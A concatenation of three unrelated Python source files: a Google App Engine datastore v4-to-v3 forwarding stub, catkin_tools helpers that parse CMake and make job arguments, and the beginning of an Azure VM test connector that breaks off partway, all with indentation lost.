from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.datastore import datastore_pb
from google.appengine.datastore import datastore_pbs
from google.appengine.datastore import datastore_query
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_pb
from google.appengine.datastore import datastore_v4_validator
from google.appengine.runtime import apiproxy_errors
SERVICE_NAME = 'datastore_v4'
V3_SERVICE_NAME = 'datastore_v3'
class DatastoreV4Stub(apiproxy_stub.APIProxyStub):
"""Implementation of the datastore_v4 API that forwards to the v3 service."""
THREADSAFE = False
def __init__(self, app_id):
apiproxy_stub.APIProxyStub.__init__(self, SERVICE_NAME)
self.__app_id = app_id
self.__entity_converter = datastore_pbs.get_entity_converter()
self.__service_converter = datastore_stub_util.get_service_converter()
self.__service_validator = datastore_v4_validator.get_service_validator()
def _Dynamic_BeginTransaction(self, req, resp):
try:
self.__service_validator.validate_begin_transaction_req(req)
v3_req = self.__service_converter.v4_to_v3_begin_transaction_req(
self.__app_id, req)
v3_resp = datastore_pb.Transaction()
self.__make_v3_call('BeginTransaction', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_begin_transaction_resp(
v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_Rollback(self, req, unused_resp):
try:
self.__service_validator.validate_rollback_req(req)
v3_req = self.__service_converter.v4_rollback_req_to_v3_txn(req)
self.__make_v3_call('Rollback', v3_req, api_base_pb.VoidProto())
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def _Dynamic_Commit(self, req, resp):
try:
self.__service_validator.validate_commit_req(req)
if req.has_transaction():
resp.mutable_deprecated_mutation_result()
resp.mutable_deprecated_mutation_result().CopyFrom(
self.__apply_v4_deprecated_mutation(req.deprecated_mutation(),
req.transaction()))
v3_req = self.__service_converter.v4_commit_req_to_v3_txn(req)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_req, v3_resp)
total_index_updates = (
resp.mutable_deprecated_mutation_result().index_updates()
+ v3_resp.cost().index_writes())
resp.mutable_deprecated_mutation_result().set_index_updates(
total_index_updates)
else:
resp.mutable_deprecated_mutation_result().CopyFrom(
self.__apply_v4_deprecated_mutation(req.deprecated_mutation(),
None))
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def _GetQueryCompositeFilter(self, filters, operator):
"""Wraps the filters in a datastore_query.CompositeFilter if length > 1."""
if not filters:
return None
elif len(filters) == 1:
return filters[0]
else:
return datastore_query.CompositeFilter(operator, filters)
def _GetV4PbCompositeFilter(self, filter_pbs, operator_pb):
"""Wraps the filters in a datastore_v4_pb.CompositeFilter if length > 1."""
if not filter_pbs:
return None
elif len(filter_pbs) == 1:
return filter_pbs[0]
else:
res_filter_pb = datastore_v4_pb.Filter()
composite_filter_pb = res_filter_pb.mutable_composite_filter()
composite_filter_pb.set_operator(operator_pb)
composite_filter_pb.filter_list().extend(filter_pbs)
return res_filter_pb
def _GetFilterPbList(self, filter_pb):
if filter_pb.has_composite_filter():
composite_filter = filter_pb.composite_filter()
assert composite_filter.operator() == datastore_v4_pb.CompositeFilter.AND
return composite_filter.filter_list()
else:
return [filter_pb]
def _ConvertGeospatialFilterOrNone(self, filter_pb):
"""Converts geo-spatial filters to filter predicates."""
if filter_pb.has_bounding_circle_filter():
return (datastore_query._BoundingCircleFilter._from_v4_pb(
filter_pb.bounding_circle_filter()))
elif filter_pb.has_bounding_box_filter():
return (datastore_query._BoundingBoxFilter._from_v4_pb(
filter_pb.bounding_box_filter()))
else:
return None
def _SplitGeospatialFilters(self, req):
"""Extracts, converts and removes geo-filters from a request.
Args:
req: a datastore_v4_pb.RunQueryRequest
Returns:
a pair (new_req, filter_predicate) where new_req is req with unsupported
filters removed and filter_predicate is a datastore_query.FilterPredicate
with the unsupported filters. filter_predicate is None if no unsupported
filters were removed.
"""
assert datastore_v4_pb.CompositeFilter._Operator_NAMES.values() == ['AND']
filter_predicate = None
new_req = datastore_v4_pb.RunQueryRequest()
new_req.CopyFrom(req)
query = new_req.mutable_query()
sub_filter_pbs = []
sub_filter_predicates = []
for filter_pb in self._GetFilterPbList(req.query().filter()):
sub_filter_predicate = self._ConvertGeospatialFilterOrNone(filter_pb)
if sub_filter_predicate is None:
sub_filter_pbs.append(filter_pb)
else:
sub_filter_predicates.append(sub_filter_predicate)
op_pb = datastore_v4_pb.CompositeFilter.AND
op = datastore_query.CompositeFilter.AND
filter_pb = self._GetV4PbCompositeFilter(sub_filter_pbs, op_pb)
filter_predicate = self._GetQueryCompositeFilter(sub_filter_predicates, op)
if filter_pb is None:
query.clear_filter()
else:
query.mutable_filter().CopyFrom(filter_pb)
return (new_req, filter_predicate)
def _Dynamic_RunQuery(self, req, resp):
try:
self.__normalize_v4_run_query_request(req)
self.__service_validator.validate_run_query_req(req)
v3_stub = apiproxy_stub_map.apiproxy.GetStub(V3_SERVICE_NAME)
new_req, filter_predicate = self._SplitGeospatialFilters(req)
if (issubclass(v3_stub.__class__, datastore_stub_util.BaseDatastore)
and filter_predicate is not None):
v3_req = self.__service_converter.v4_run_query_req_to_v3_query(new_req)
v3_resp = datastore_pb.QueryResult()
v3_stub._Dynamic_RunQuery(v3_req, v3_resp, filter_predicate)
else:
v3_req = self.__service_converter.v4_run_query_req_to_v3_query(req)
v3_resp = datastore_pb.QueryResult()
self.__make_v3_call('RunQuery', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_run_query_resp(v3_resp)
if req.query().projection_list():
if req.query().projection_list() == ['__key__']:
result_type = datastore_v4_pb.EntityResult.KEY_ONLY
else:
result_type = datastore_v4_pb.EntityResult.PROJECTION
v4_resp.mutable_batch().set_entity_result_type(result_type)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_ContinueQuery(self, req, resp):
try:
self.__service_validator.validate_continue_query_req(req)
v3_req = self.__service_converter.v4_to_v3_next_req(req)
v3_resp = datastore_pb.QueryResult()
self.__make_v3_call('Next', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_continue_query_resp(v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_Lookup(self, req, resp):
try:
self.__service_validator.validate_lookup_req(req)
v3_req = self.__service_converter.v4_to_v3_get_req(req)
v3_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_lookup_resp(v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_AllocateIds(self, req, resp):
v3_stub = apiproxy_stub_map.apiproxy.GetStub(V3_SERVICE_NAME)
try:
self.__service_validator.validate_allocate_ids_req(req)
if req.allocate_list():
v3_refs = self.__entity_converter.v4_to_v3_references(
req.allocate_list())
v3_full_refs = v3_stub._AllocateIds(v3_refs)
resp.allocated_list().extend(
self.__entity_converter.v3_to_v4_keys(v3_full_refs))
elif req.reserve_list():
v3_refs = self.__entity_converter.v4_to_v3_references(
req.reserve_list())
v3_stub._AllocateIds(v3_refs)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def __insert_v3_entity(self, v3_entity, v3_txn):
"""Inserts a v3 entity.
Args:
v3_entity: a datastore_v4_pb.Entity
v3_txn: a datastore_pb.Transaction or None
Returns:
the number of index writes that occurred
Raises:
ApplicationError: if the entity already exists
"""
if not v3_txn:
v3_txn = datastore_pb.Transaction()
v3_begin_txn_req = datastore_pb.BeginTransactionRequest()
v3_begin_txn_req.set_app(v3_entity.key().app())
self.__make_v3_call('BeginTransaction', v3_begin_txn_req, v3_txn)
self.__insert_v3_entity(v3_entity, v3_txn)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_txn, v3_resp)
return v3_resp.cost().index_writes()
v3_get_req = datastore_pb.GetRequest()
v3_get_req.mutable_transaction().CopyFrom(v3_txn)
v3_get_req.key_list().append(v3_entity.key())
v3_get_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_get_req, v3_get_resp)
if v3_get_resp.entity(0).has_entity():
raise apiproxy_errors.ApplicationError(datastore_v4_pb.Error.BAD_REQUEST,
'Entity already exists.')
v3_put_req = datastore_pb.PutRequest()
v3_put_req.mutable_transaction().CopyFrom(v3_txn)
v3_put_req.entity_list().append(v3_entity)
v3_put_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_put_req, v3_put_resp)
return v3_put_resp.cost().index_writes()
def __update_v3_entity(self, v3_entity, v3_txn):
"""Updates a v3 entity.
Args:
v3_entity: a datastore_v4_pb.Entity
v3_txn: a datastore_pb.Transaction or None
Returns:
the number of index writes that occurred
Raises:
ApplicationError: if the entity does not exist
"""
if not v3_txn:
v3_txn = datastore_pb.Transaction()
v3_begin_txn_req = datastore_pb.BeginTransactionRequest()
v3_begin_txn_req.set_app(v3_entity.key().app())
self.__make_v3_call('BeginTransaction', v3_begin_txn_req, v3_txn)
self.__update_v3_entity(v3_entity, v3_txn)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_txn, v3_resp)
return v3_resp.cost().index_writes()
v3_get_req = datastore_pb.GetRequest()
v3_get_req.mutable_transaction().CopyFrom(v3_txn)
v3_get_req.key_list().append(v3_entity.key())
v3_get_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_get_req, v3_get_resp)
if not v3_get_resp.entity(0).has_entity():
raise apiproxy_errors.ApplicationError(datastore_v4_pb.Error.BAD_REQUEST,
'Entity does not exist.')
v3_put_req = datastore_pb.PutRequest()
v3_put_req.mutable_transaction().CopyFrom(v3_txn)
v3_put_req.entity_list().append(v3_entity)
v3_put_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_put_req, v3_put_resp)
return v3_put_resp.cost().index_writes()
def __apply_v4_deprecated_mutation(self, v4_deprecated_mutation, v4_txn):
"""Applies a v4 DeprecatedMutation.
Args:
v4_deprecated_mutation: a datastore_v4_pb.DeprecatedMutation
v4_txn: an optional v4 transaction handle or None
Returns:
a datastore_v4_pb.DeprecatedMutationResult
"""
index_writes = 0
v3_txn = None
if v4_txn:
v3_txn = datastore_pb.Transaction()
self.__service_converter.v4_to_v3_txn(v4_txn, v3_txn)
for v4_entity in v4_deprecated_mutation.insert_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
index_writes += self.__insert_v3_entity(v3_entity, v3_txn)
for v4_entity in v4_deprecated_mutation.update_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
index_writes += self.__update_v3_entity(v3_entity, v3_txn)
v3_insert_auto_req = datastore_pb.PutRequest()
if v3_txn:
v3_insert_auto_req.mutable_transaction().CopyFrom(v3_txn)
for v4_entity in v4_deprecated_mutation.insert_auto_id_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
v3_insert_auto_req.entity_list().append(v3_entity)
v3_insert_auto_id_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_insert_auto_req, v3_insert_auto_id_resp)
index_writes += v3_insert_auto_id_resp.cost().index_writes()
v3_upsert_req = datastore_pb.PutRequest()
if v3_txn:
v3_upsert_req.mutable_transaction().CopyFrom(v3_txn)
for v4_entity in v4_deprecated_mutation.upsert_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
v3_upsert_req.entity_list().append(v3_entity)
v3_upsert_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_upsert_req, v3_upsert_resp)
index_writes += v3_upsert_resp.cost().index_writes()
v3_delete_req = datastore_pb.DeleteRequest()
if v3_txn:
v3_delete_req.mutable_transaction().CopyFrom(v3_txn)
for v4_key in v4_deprecated_mutation.delete_list():
self.__entity_converter.v4_to_v3_reference(v4_key,
v3_delete_req.add_key())
v3_delete_resp = datastore_pb.DeleteResponse()
self.__make_v3_call('Delete', v3_delete_req, v3_delete_resp)
index_writes += v3_delete_resp.cost().index_writes()
v4_deprecated_mutation_result = datastore_v4_pb.DeprecatedMutationResult()
for v3_ref in v3_insert_auto_id_resp.key_list():
self.__entity_converter.v3_to_v4_key(
v3_ref, v4_deprecated_mutation_result.add_insert_auto_id_key())
v4_deprecated_mutation_result.set_index_updates(index_writes)
return v4_deprecated_mutation_result
def __normalize_v4_run_query_request(self, v4_req):
pass
def __make_v3_call(self, method, v3_req, v3_resp):
apiproxy_stub_map.MakeSyncCall(V3_SERVICE_NAME, method, v3_req, v3_resp)
|
|
# Copyright 2014 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import re
import sys
from multiprocessing import cpu_count
from catkin_tools.common import wide_log
import catkin_tools.execution.job_server as job_server
def add_context_args(parser):
"""Add common workspace and profile args to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add_workspace_arg(parser)
add('--profile', default=None,
help='The name of a config profile to use (default: active profile)')
def add_workspace_arg(parser):
"""Add common workspace arg to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add('--workspace', '-w', default=None,
help='The path to the catkin_tools workspace or a directory contained within it (default: ".")')
def add_cmake_and_make_and_catkin_make_args(parser):
"""Add common make and cmake args to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add('-j', '--jobs', default=None, type=int,
help='Maximum number of build jobs to be distributed across active packages. (default is cpu count)')
add('-p', '--parallel-packages', metavar='PACKAGE_JOBS', dest='parallel_jobs', default=None, type=int,
help='Maximum number of packages allowed to be built in parallel (default is cpu count)')
add('-l', '--load-average', default=None, type=float,
help='Maximum load average before no new build jobs are scheduled')
# Deprecated flags kept for compatibility
add('--parallel-jobs', '--parallel', action='store_true', dest='parallel_jobs', help=argparse.SUPPRESS)
add = parser.add_mutually_exclusive_group().add_argument
add('--jobserver', dest='use_internal_make_jobserver', default=None, action='store_true',
help='Use the internal GNU Make job server which will limit the number '
'of Make jobs across all active packages.')
add('--no-jobserver', dest='use_internal_make_jobserver', default=None, action='store_false',
help='Disable the internal GNU Make job server, and use an external one (like distcc, for example).')
add = parser.add_mutually_exclusive_group().add_argument
add('--env-cache', dest='use_env_cache', default=None, action='store_true',
help='Re-use cached environment variables when re-sourcing a resultspace that has been '
'loaded at a different stage in the task.')
add('--no-env-cache', dest='use_env_cache', default=None, action='store_false',
help='Don\'t cache environment variables when re-sourcing the same resultspace.')
add = parser.add_mutually_exclusive_group().add_argument
add('--cmake-args', metavar='ARG', dest='cmake_args', nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to CMake. '
'It collects all of following arguments until a "--" is read.')
add('--no-cmake-args', dest='cmake_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to CMake.')
add = parser.add_mutually_exclusive_group().add_argument
add('--make-args', metavar='ARG', dest='make_args', nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to make. '
'It collects all of following arguments until a "--" is read.')
add('--no-make-args', dest='make_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to make (does not affect --catkin-make-args).')
add = parser.add_mutually_exclusive_group().add_argument
add('--catkin-make-args', metavar='ARG', dest='catkin_make_args',
nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to make but only for catkin packages. '
'It collects all of following arguments until a "--" is read.')
add('--no-catkin-make-args', dest='catkin_make_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to make for catkin packages (does not affect --make-args).')
def split_arguments(args, splitter_name=None, splitter_index=None):
"""Split list of args into (other, split_args, other) between splitter_name/index and `--`
:param args: list of all arguments
:type args: list of str
:param splitter_name: optional argument used to split out specific args
:type splitter_name: str
:param splitter_index: specific index at which to split
:type splitter_index: int
:returns: tuple (other, split_args)
"""
if splitter_index is None:
if splitter_name not in args:
return args, []
splitter_index = args.index(splitter_name)
start_index = splitter_index + 1
end_index = args.index('--', start_index) if '--' in args[start_index:] else None
if end_index:
return (
args[0:splitter_index],
args[start_index:end_index],
args[(end_index + 1):]
)
else:
return (
args[0:splitter_index],
args[start_index:],
[]
)
def _extract_cmake_and_make_arguments(args, extract_catkin_make):
"""Extract arguments which are meant to be passed to CMake and GNU Make
through the catkin_tools command line interface.
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, make args, and catkin make args
:rtype: tuple
"""
cmake_args = []
make_args = []
catkin_make_args = []
arg_types = {}
if '--no-cmake-args' not in args:
arg_types['--cmake-args'] = cmake_args
if '--no-make-args' not in args:
arg_types['--make-args'] = make_args
if '--no-catkin_make_args' not in args and extract_catkin_make:
arg_types['--catkin-make-args'] = catkin_make_args
# Get the splitter indexes for each type (multiples allowed) starting at the end
ordered_splitters = reversed([
(i, t)
for i, t in enumerate(args)
if t in arg_types
])
# Extract explicit specific args
head_args = args
tail_args = []
for index, name in ordered_splitters:
# Update whole args list, get specific args
head_args, specific, tail = split_arguments(head_args, splitter_index=index)
tail_args.extend(tail)
arg_types[name][0:0] = specific
args = head_args + tail_args
# classify -D* and -G* arguments as cmake specific arguments
if '--cmake-args' in arg_types:
implicit_cmake_args = [a for a in args if a.startswith('-D') or a.startswith('-G')]
args = [a for a in args if a not in implicit_cmake_args]
cmake_args = implicit_cmake_args + cmake_args
if '--no-cmake-args' not in args and len(cmake_args) == 0:
cmake_args = None
if '--no-make-args' not in args and len(make_args) == 0:
make_args = None
if '--no-catkin-make-args' not in args and len(catkin_make_args) == 0 and extract_catkin_make:
catkin_make_args = None
return args, cmake_args, make_args, catkin_make_args
def extract_cmake_and_make_and_catkin_make_arguments(args):
"""Extracts cmake, make, and catkin specific make arguments from given system arguments
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, make args, and catkin make args
:rtype: tuple
"""
return _extract_cmake_and_make_arguments(args, extract_catkin_make=True)
def extract_cmake_and_make_arguments(args):
"""Extracts cmake and make arguments from the given system arguments
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, and make_args
:rtype: tuple
"""
args, cmake_args, make_args, _ = _extract_cmake_and_make_arguments(args, extract_catkin_make=False)
return args, cmake_args, make_args
def extract_jobs_flags_values(mflags):
"""Gets the values of the make jobs flags
:param mflags: string of space separated make arguments
:type mflags: str
:returns: dictionary mapping jobs flags to jobs flags values
:rtype: dict
"""
jobs_dict = {'jobs': None, 'load-average': None}
# These regular expressions use (?P<name>...) for named capture groups
# (^|\s) and (?=$|\s) make sure that the flag is surrounded by whitespace
regex = r'(^|\s)(-j\s*|--jobs(=|\s+))(?P<jobs>\d*)(?=$|\s)'
for m in re.finditer(regex, mflags):
if m.group('jobs'):
jobs_dict['jobs'] = int(m.group('jobs'))
regex = r'(^|\s)(-l\s*|--load-average(=|\s+))(?P<load>\d*\.?\d*)(?=$|\s)'
for m in re.finditer(regex, mflags):
if m.group('load'):
jobs_dict['load-average'] = float(m.group('load'))
return jobs_dict
def extract_jobs_flags(mflags):
"""Extracts make job flags from a list of other make flags, i.e. -j8 -l8
:param mflags: string of space separated make arguments
:type mflags: str
:returns: list of make jobs flags
:rtype: list
"""
if not mflags:
return None
# Each line matches a flag type, i.e. -j, -l, --jobs, --load-average
# (?:^|\s) and (?=$|\s) make sure that the flag is surrounded by whitespace
# (?:...) is just a group that will not be captured, this is necessary because the whole flag should be captured
# The upper two expressions are simple, they just match the flag, optional whitespace and an optional number
# The bottom two expressions are more complicated because the long flag may be # followed by '=' and a number,
# whitespace and a number or nothing
regex = r'(?:^|\s)(-j\s*\d*)(?=$|\s)|' + \
r'(?:^|\s)(-l\s*\d*\.?\d*)(?=$|\s)|' + \
r'(?:^|\s)(--jobs(?:(?:=|\s+)\d+)?)(?=$|\s)|' + \
r'(?:^|\s)(--load-average(?:(?:=|\s+)\d*\.?\d+)?)(?=$|\s)'
filtered_flags = []
for match in re.findall(regex, mflags):
filtered_flags.extend([m.strip() for m in match if m])
return filtered_flags or None
def handle_make_arguments(
input_make_args,
force_single_threaded_when_running_tests=False):
"""Special handling for make arguments.
If force_single_threaded_when_running_tests is True, jobs flags are
replaced with -j1, because tests cannot handle parallelization.
If no job flags are present and there are none in the MAKEFLAGS environment
variable, then make flags are set to the cpu_count, e.g. -j4 -l4.
:param input_make_args: list of make arguments to be handled
:type input_make_args: list
:param force_single_threaded_when_running_tests: self explanatory
:type force_single_threaded_when_running_tests: bool
:returns: copied list of make arguments, potentially with some modifications
:rtype: list
"""
make_args = list(input_make_args)
# Get the values for the jobs flags which may be in the make args
jobs_dict = extract_jobs_flags_values(' '.join(make_args))
jobs_args = extract_jobs_flags(' '.join(make_args))
if jobs_args:
# Remove jobs flags from cli args if they're present
make_args = re.sub(' '.join(jobs_args), '', ' '.join(make_args)).split()
if force_single_threaded_when_running_tests:
# force single threaded execution when running test since rostest does not support multiple parallel runs
run_tests = [a for a in make_args if a.startswith('run_tests')]
if run_tests:
wide_log('Forcing "-j1" for running unit tests.')
jobs_dict['jobs'] = 1
if job_server.gnu_make_enabled():
make_args.extend(job_server.gnu_make_args())
else:
if 'jobs' in jobs_dict:
make_args.append('-j{0}'.format(jobs_dict['jobs']))
if 'load-average' in jobs_dict:
make_args.append('-l{0}'.format(jobs_dict['load-average']))
return make_args
def configure_make_args(make_args, jobs_args, use_internal_make_jobserver):
"""Initialize the internal GNU Make jobserver or configure it as a pass-through
:param make_args: arguments to be passed to GNU Make
:type make_args: list
:param jobs_args: job arguments overriding make flags
:type jobs_args: list
:param use_internal_make_jobserver: if true, use the internal jobserver
:type make_args: bool
:rtype: tuple (final make_args, using makeflags, using cliflags, using jobserver)
"""
# Configure default jobs options: use all CPUs in each package
try:
# NOTE: this will yield greater than 100% CPU utilization
n_cpus = cpu_count()
jobs_flags = {
'jobs': n_cpus,
'load-average': n_cpus + 1}
except NotImplementedError:
# If the number of cores cannot be determined, limit to one job
jobs_flags = {
'jobs': 1,
'load-average': 1}
# Get MAKEFLAGS from environment
makeflags_jobs_flags = extract_jobs_flags(os.environ.get('MAKEFLAGS', ''))
using_makeflags_jobs_flags = makeflags_jobs_flags is not None
if using_makeflags_jobs_flags:
makeflags_jobs_flags_dict = extract_jobs_flags_values(' '.join(makeflags_jobs_flags))
jobs_flags.update(makeflags_jobs_flags_dict)
# Extract make jobs flags (these override MAKEFLAGS)
cli_jobs_flags = jobs_args
using_cli_flags = len(cli_jobs_flags) > 0
if cli_jobs_flags:
jobs_flags.update(extract_jobs_flags_values(' '.join(cli_jobs_flags)))
# Remove jobs flags from cli args if they're present
make_args = re.sub(' '.join(cli_jobs_flags), '', ' '.join(make_args)).split()
# Instantiate the jobserver
job_server.initialize(
max_jobs=jobs_flags.get('jobs', None),
max_load=jobs_flags.get('load-average', None),
gnu_make_enabled=use_internal_make_jobserver)
# If the jobserver is supported
if job_server.gnu_make_enabled():
jobs_args = []
else:
jobs_args = cli_jobs_flags
return make_args + jobs_args, using_makeflags_jobs_flags, using_cli_flags, job_server.gnu_make_enabled()
def argument_preprocessor(args):
"""Perform processing of argument patterns which are not captured by
argparse, before being passed to argparse
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: a tuple containing a list of the arguments which can be handled
by argparse and a dict of the extra arguments which this function has
extracted
:rtype: tuple
"""
# CMake/make pass-through flags collect dashed options. They require special
# handling or argparse will complain about unrecognized options.
# NOTE: http://bugs.python.org/issue9334
args = sys.argv[1:] if args is None else args
extract_make_args = extract_cmake_and_make_and_catkin_make_arguments
args, cmake_args, make_args, catkin_make_args = extract_make_args(args)
# Extract make jobs flags (these override MAKEFLAGS later on)
jobs_args = extract_jobs_flags(' '.join(args))
if jobs_args:
# Remove jobs flags from cli args if they're present
args = [arg for arg in args if arg not in jobs_args]
elif make_args is not None:
jobs_args = extract_jobs_flags(' '.join(make_args))
if jobs_args:
# Remove jobs flags from cli args if they're present
make_args = [arg for arg in make_args if arg not in jobs_args]
extras = {
'cmake_args': cmake_args,
'make_args': make_args,
'jobs_args': jobs_args,
'catkin_make_args': catkin_make_args,
}
return args, extras
|
|
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import time
import logging
import ConfigParser
import uuid
import random
import string
from utils import constants
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from msrestazure.azure_exceptions import CloudError
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
class AzureConnector:
"""
Azure connector that uses azure-sdk-for-python plugin.
"""
def __init__(self, clientid=None, secret=None, subscriptionid=None, tenantid=None,
imageid=None, instancetype=None, user=None, localpath=None, location=None,
sriov=None):
"""
Init Azure connector to create and configure instance VMs.
:param clientid: client id obtained from Azure AD application (create key)
https://docs.microsoft.com/en-us/azure/azure-resource-manager/
resource-group-create-service-principal-portal
:param secret: client secret obtained from the Azure AD application
:param subscriptionid: Azure subscription id
:param tenantid: Azure tenant/directory id
:param imageid: Azure requires multiple image references (publisher, offer, sku, version),
for simplicity only the offer and sku should be provided: e.g. UbuntuServer#16.04.0-LTS
:param instancetype: Azure hardware profile or vm size e.g. 'Standard_DS1'
:param user: remote ssh user for the VM
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param location: Azure global location to connect to
:param sriov: Enable/disable Accelerated Networking option
"""
credentials = ServicePrincipalCredentials(client_id=clientid, secret=secret,
tenant=tenantid)
self.resource_client = ResourceManagementClient(credentials, subscriptionid)
self.compute_client = ComputeManagementClient(credentials, subscriptionid)
self.storage_client = StorageManagementClient(credentials, subscriptionid)
self.network_client = NetworkManagementClient(credentials, subscriptionid)
self.instancetype = instancetype
self.localpath = localpath
self.sriov = sriov
self.host_key_file = os.path.join(self.localpath, 'known_hosts')
if not location:
self.location = 'westus'
else:
self.location = location
if 'Ubuntu' in imageid:
self.imageid = {'publisher': 'Canonical',
'offer': imageid.split('#')[0],
'sku': imageid.split('#')[1],
'version': 'latest'
}
self.user = user
self.dns_suffix = '.{}.cloudapp.azure.com'.format(self.location)
tag = str(uuid.uuid4()).replace('-', '')
self.key_name = 'test_ssh_key'
self.group_name = 'middleware_' + tag
self.vmnet_name = 'm_vmnet' + tag
self.subnet_name = 'm_subnet' + tag
self.os_disk_name = 'm_osdisk' + tag
self.storage_account = 'stor' + tag[:18]
self.ip_config_name = 'm_ipconfig' + tag
self.nic_name = 'm_nic' + tag
self.subnet = None
self.vms = []
def connect(self):
"""
Obtain the Azure connector by authenticating. This also creates the keypair and
